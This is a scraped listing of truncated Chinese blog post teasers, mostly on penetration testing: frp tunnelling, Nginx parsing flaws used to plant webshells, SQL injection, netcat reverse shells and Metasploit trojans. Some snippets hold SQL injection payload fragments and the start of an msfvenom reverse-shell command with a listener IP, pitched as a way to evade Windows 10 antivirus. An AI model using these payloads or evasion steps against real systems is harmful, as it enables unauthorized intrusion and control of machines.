1.frp是一款免费的内网穿透工具,当两个局域网的时候可以通过这个来进行渗透2.首先准备一台具有公网的服务器3.和ftp一样都是具有s端和c端的,s端下载和c端下载一定要保持...
发简信
IP属地:山西
-
frp内网穿透结合metasploit
-
vue开发环境搭建Mac版一、前言因工作缘故,需要做一个移动端app,面对2016下半年至今webapp最流行的三个技术React,angular,vue,三选一,如何先,经过前期的技术选型,最后决定...
-
nginx务器解析漏洞(二)
CVE-2013-4547(文件名逻辑漏洞) 影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 影响说明:绕过服务器策略,上传webshel...
-
nginx服务器解析漏洞(一)
Nginx解析漏洞: 影响版本:全版本 影响说明:命令执行,获取服务器web权限 环境说明:Nginx 1.13.0 环境搭建:此次环境使用docker环境搭建,环境采用地址...
-
你好,怎么搭建的这个pte环境呢?
CISP-PTE历年真题解析
第一题:基础题目之SQL注入 解题思路一 先随便注册一个账号,用这个账号登陆,在发表界面发布内容并抓包,把这个包保存到sql.txt里边,用sqlmap去注入 解题思路二 注...
-
Mac遇到已损坏文件的解决脚本
今天下载了一个软件可是提醒我已经损坏,所以百度了一下一条命令搞定,可是为了以后的自动化与方便,我用shell脚本的方式写了一个脚本mac系统命名为.command 双击运行即...
-
SQL Injection一把梭
0.暴字段数:1’ order by 3#1.暴库:查询database,1' union select 1,database()#2.暴表名:查询table_name,1'...
-
Mac pro最新安装metasploit方法
最近看了一些网上的安装metasploit方法,觉得有点过时了,遂,自行安装并测试之 以下是安装步骤: 1.从GITHUB上克隆METASPLOIT项目到本地,这里我不同于别...
-
nc反向反弹shell
什么是nc? 瑞士军刀netcat nc正向获取shell nc反向获取shell 如何选取? 我的本地机器是阉割版的nc,出于安全考虑没有-e的选项,但是目标机器yum i...
-
上次看到你的文章没关注,没想到终究逃不过这一次
NC——反弹shell
瑞士军刀netcat,这只喵的名气不言而喻,不管是渗透还是取证,100KB的小身板却蕴含着巨大的能量,今天我们来简单研究下如何使用nc反弹shell。 先来个正向shell做...
-
米斯特安全/TideSec/ParrotSec
-
-
metasploit绕过win10实时防护免杀方法
在生成木马的基础上加上一个encoder参数编码做到免杀 msfvenom -p windows/shell_reverse_tcp LHOST=10.8.1.46 LPOR...
-
内网渗透的思路与方法总结
狙杀链 侦查阶段(Reconnaisance)收集攻击目标的信息 武器化阶段(Weaponization)构建可以使用的攻击工具,可以说是广义角度的渗透 传递阶段(Deliv...
-
记一次metasploit生成木马并控制虚拟机环境 windows10 Mac终端 准备 关闭windows10的防火墙,特别是实时防护这一项,不然无法成功,win7没做测试应该可以直接成功 通过metasploit生成...
